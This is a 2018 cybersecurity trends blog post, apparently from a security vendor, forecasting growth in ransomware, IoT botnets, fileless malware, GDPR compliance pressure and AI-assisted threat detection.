When thinking about security trends, 2017 was a banner year for cybercrime:
- Yahoo announced the largest known breach in history, which affected all of its 3 billion users (approximately half the world’s estimated population)
- Equifax confirmed that it had been breached, and that about half of all Americans had their personally identifiable information compromised
- Cutting-edge strains of ransomware—WannaCry and NotPetya—cost the global economy hundreds of millions of dollars
- Researchers discovered “KRACK,” a dangerous Wi-Fi exploit of the WPA2 standard
And that barely skims the surface of last year’s cyber-treachery. But 2018 is already here, and that means it’s time to set our sights on the year ahead.
Here’s what security trends we expect to see in the next 12 months:
1. Another Spike in Ransomware Attacks
In 2016, the world gasped as ransomware raked in approximately $1 billion. In 2017, that figure rocketed to an estimated $5 billion. If this trend continues, we can expect 2018 to be ransomware’s best/worst year to date. In fact, by 2019, Cybersecurity Ventures predicts ransomware damages to exceed $11 billion.
Some key trends that will contribute to ransomware’s rapid growth through 2018 and beyond include:
- Phishing attacks will become will increasingly sophisticated
- Cryptocurrency’s growth will improve hackers’ ability to remain untraceable as they collect ransoms
- Ransomware will target the cloud more heavily
- Hackers will weaponize AI and other advanced tactics to more accurately predict the value of encrypted assets, and to improve their abilities to identify and leverage zero-day ransomware
The last trend is particularly worrisome, and will require advanced anomaly detection capabilities to stay protected.
2. IoT Will Be a Core Attack Vector
The Internet of Things is already bringing convenience to consumers and process optimization to businesses, but it comes at a cost. According to Information Age, IoT may in fact be the “security crisis of 2018.” Every new endpoint is a new attack vector, and IoT has proven vulnerable in the past (e.g., the Mirai botnet army in late 2016).
In a recent webinar, Arctic Wolf Networks’ Chief Architect Matthew Thurston explained the dangers of the rising threat of botnets in general. This includes IoT devices. Hackers can steal these IP addresses and subsequently use them to spam businesses or use them to create powerful botnet armies for the purposes of DDoS.
Universally, better endpoint security and proper password protection will be needed to protect the IoT. But to defend your business, you’ll need to inspect network connections between systems more closely than ever before. The IoT is a gateway to DDoS, ransomware (just imagine an entire manufacturing facility taken offline) and other more advanced forms of network intrusion.
3. GDPR’s Impact will Resonate Globally
This is part prediction, part statement of fact, and will impact all companies doing business in Europe. Starting May 25, the General Data Protection Regulation will require all organizations that process or store data originating in an EU member state to abide by a strict new set of standards. These include, but aren’t limited to, the following:
- Businesses must appoint a data protection officer responsible for ensuring the organization stores and processes EU member state data in compliance with GDPR
- Personal data must not be gathered without an EU citizen’s consent
- Every EU citizen has the right to be forgotten, meaning they may request the data holder to erase all data pertaining to them
- Data protection impact assessments (DPIA) that identify, assess and mitigate data privacy and security risks will be mandatory
- Breach notifications must be issued within 72 hours of detection
- Unauthorized data transfers outside member states will be subject to penalties
Failing to adhere to any of GDPR’s core measures may result in a fine of €20 million (~$24.5 million), or 4 percent of annual worldwide turnover of the preceding financial year (whichever is greater). This puts pressure on security operations teams worldwide to employ thorough due diligence as they protect EU member-state data.
Read more about GDPR here.
4. Fileless Malware Continues Its Explosive Growth
“Anti-virus and application whitelisting tools struggle to detect fileless threats.”
Fileless malware, also known as “zero-footprint” or “non-malware” attacks, exploded onto the criminal-hacking scene in 2017. These elusive threats don’t need to install new software on an endpoint to infect it, instead exploiting in-memory access. In other words, fileless attacks actually leverage tools that are native to the operating system—particularly PowerShell and Windows Management Instrumentation (WMI)—to carry out the attack
Consequently, traditional anti-virus and application whitelisting tools struggle to detect them. Distinguishing between a malicious or legitimate PowerShell execution, for instance, is incredibly complex and requires deeper context into specific behaviors.
Unfortunately, the Ponemon Institute estimated that more than half of all attacks against businesses in 2017 were fileless. We can all but guarantee that this percentage will increase in 2018.
5. Hybrid AI Will Shine Brightly in a Dark Threat Landscape
With fileless attacks, advanced persistent threats and ransomware backed by machine learning all looming on the horizon, the need for deeper, contextual security monitoring has never been so urgent.
Machine learning can provide much of this context by sifting through enormous batches of log data exponentially faster than human analysts can. It’s not surprising, then, that the AI-based security market is growing at a compound annual rate over 31 percent.
But as pointed out during AWN’s webinar “Hybrid-AI: Boost Cybersecurity with Human Augmented Machine Learning,” security analysts will need to interpret the actions of AI, and provide a continuous feedback loop to improve threat detection and response. AI is a powerful cyberthreat detection resource but, for now and the foreseeable future, it requires the tribal knowledge of an experienced security analyst.